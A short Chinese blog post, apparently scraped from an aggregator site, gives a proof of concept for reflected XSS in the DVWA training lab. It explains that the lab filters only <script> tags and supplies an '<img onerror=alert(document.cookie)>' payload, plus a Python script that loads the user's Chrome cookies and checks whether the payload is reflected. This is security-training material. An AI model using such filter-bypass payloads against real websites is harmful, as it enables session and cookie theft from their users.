当前位置:网站首页>POC——DVWA‘s XSS Reflected
POC——DVWA‘s XSS Reflected
2022-07-17 05:03:00 【wavesky111】
XSS反射型中,三个等级内全都只定义了对<script>标签的过滤,所以通用一个<img>标签即可~
import requests
import browser_cookie3
from urllib import parse
cookie = browser_cookie3.chrome()
text1 = '<img src=1 onerror=alert(document.cookie)>'
string1 = parse.quote(text1)
url = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/xss_r/?name='+string1
response = requests.get(url=url,cookies=cookie)
re = 'document.cookie'
flag=re in str(response.content)
if flag:
print("It looks likely vulnerable")
else:
print("It is strong")此处没有必要一定要把请求url编码,在这里只是想加一下而已~
边栏推荐
- Record a stored procedure to batch modify the table structure
- TiDB 性能分析和优化
- 三种高并发方式实现i++
- Project structure of wechat applet
- 模板类的声明和定义
- 数据库取配置文件字段,然后进行数据处理和判断
- 2022最新版校园跑腿小程序源码
- shardingproxy分库分表实战及同类产品对比
- Service end interface test - test point of interface test [Hangzhou multi tester] [Hangzhou multi tester _ Wang Sir]
- Mysql8.026-- view (bottom)
猜你喜欢
![[FPGA tutorial case 27] realize dual port RAM ping-pong structure through Verilog](/img/64/211c5a6d6e0a8701136fa969d6d9e4.png)
[FPGA tutorial case 27] realize dual port RAM ping-pong structure through Verilog
Constraints on MySQL tables (Basics)
[论文精读]BERT
索引库操作基本操作
Blessing for the elderly popular short video wechat applet source code download support traffic master
Tidb performance analysis and optimization
高等数学笔记:伍月习题选集
快速掌握MIPI开发攻略
TiDB 性能优化概述
Database learning notes (I) retrieval data
![[论文精读]BERT](/img/7f/7202f79ab22ddff5f477299d2cd3d5)
随机推荐
Using circular statements to make login programs
HighTec 新建 AURIX TC37X demo 工程
2022最新版校园跑腿小程序源码
新生任务-5
一文了解Zipkin
MYSQL两个查询条件取并集然后进行查询
MySQL必知必会!!!看这一篇就足够了!!!
Service end interface test - test point of interface test [Hangzhou multi tester] [Hangzhou multi tester _ Wang Sir]
Basic operations of index library operation
知识图谱de构建与应用(五):知识推理
毕设:基于Vue+Socket+Redis的分布式高并发防疫健康管理系统
3.RestClient查询文档
NPM installation tutorial
DirectExchange交换机的简单使用。
Kubernetes 的监控与告警
Deleting snapshot: error deleting snapshot: Dictionary problem
Website online package APK system source code
Advanced query of MySQL table
RestClient操作文档
Construction and application of knowledge map de (VI): storage, service and quality of knowledge map